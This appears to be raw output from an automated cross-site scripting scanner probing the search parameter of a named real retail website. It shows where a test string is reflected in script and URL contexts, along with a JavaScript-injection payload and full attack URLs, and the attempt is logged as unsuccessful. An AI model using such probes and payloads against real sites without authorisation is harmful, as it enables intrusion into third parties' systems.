https://www.vitabiotics.com/

GET Params:[1]
['q']
_______________________________________________________________________________________________________
https://www.vitabiotics.com/pages/search-results-page?q=/uvw"xyz'yxz<zxy

----------------------------------------------------------------------------------
Attribute Context: [0]

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [2]
<script type="text/javascript">
 var url = window.location.href;
var axel = Math.random() + "";
var a = axel * 10000000000000;
document.write('<iframe src="https://4552018.fls.doubleclick.net/activityi;src=4552018;type=Conve0;cat=vtbs_0;u1=;u2=;u3=;u4=;u5=0;u6=www.vitabiotics.com/pages/search-results-page?q=/uvw%22xyz'yxz%3Czxy;dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;npa=;ord=' + a + '?" width="1" height="1" frameborder="0" style="display:none"></iframe>');
</script>
<script id="__st">var __st={"a":2772631621,"offset":3600,"reqid":"39e3563b-0ad9-4d0a-9f2e-cfbf9f392331","pageurl":"www.vitabiotics.com\/pages\/search-results-page?q=\/uvw%22xyz'yxz%3Czxy","s":"pages-27867873349","u":"edd6685bc584","p":"page","rtyp":"page","rid":27867873349};</script>

----------------------------------------------------------------------------------
URI Context: [4]
<link rel="canonical" href="https://www.vitabiotics.com/pages/search-results-page?q=%2fuvw%22xyz%27yxz%3czxy">
<iframe src="https://4552018.fls.doubleclick.net/activityi;src=4552018;type=Conve0;cat=vtbs_0;u1=;u2=;u3=;u4=;u5=0;u6=www.vitabiotics.com/pages/search-results-page?q=/uvw%22xyz'yxz%3Czxy;dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;npa=;ord=' + a + '?" width="1" height="1" frameborder="0" style="display:none">
<iframe src="https://4552018.fls.doubleclick.net/activityi;src=4552018;type=Conve0;cat=vtbs_0;u1=;u2=;u3=;u4=;u5=No;u6=www.vitabiotics.com/pages/search-results-page?q=/uvw%22xyz'yxz%3Czxy;dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;npa=;ord=1?" width="1" height="1" frameborder="0" style="display:none">
<meta property="og:url" content="https://www.vitabiotics.com/pages/search-results-page?q=%2fuvw%22xyz%27yxz%3czxy">

----------------------------------------------------------------------------------

Mitigation        "	'	<	/ 
SCRIPT:		True	False	True	False

Attack Payloads for SCRIPT
["'; confirm`1`; '"]

SCRIPT Attack Url: https://www.vitabiotics.com/pages/search-results-page?q='; confirm`1`; '

 ______Detection  UnSuccessful with payload: '; confirm`1`; '

Mitigation        "	'	<	/ 
SCRIPT:		True	False	True	True

Attack Payloads for SCRIPT
["'; confirm`1`; '"]

SCRIPT Attack Url: https://www.vitabiotics.com/pages/search-results-page?q='; confirm`1`; '

 ______Detection  UnSuccessful with payload: '; confirm`1`; '

Mitigation        "	'	<	/ 
URL:		True	True	True	True
Mitigation        "	'	<	/ 
URL:		True	False	True	False
Mitigation        "	'	<	/ 
URL:		True	False	True	False
Mitigation        "	'	<	/ 
URL:		True	True	True	True
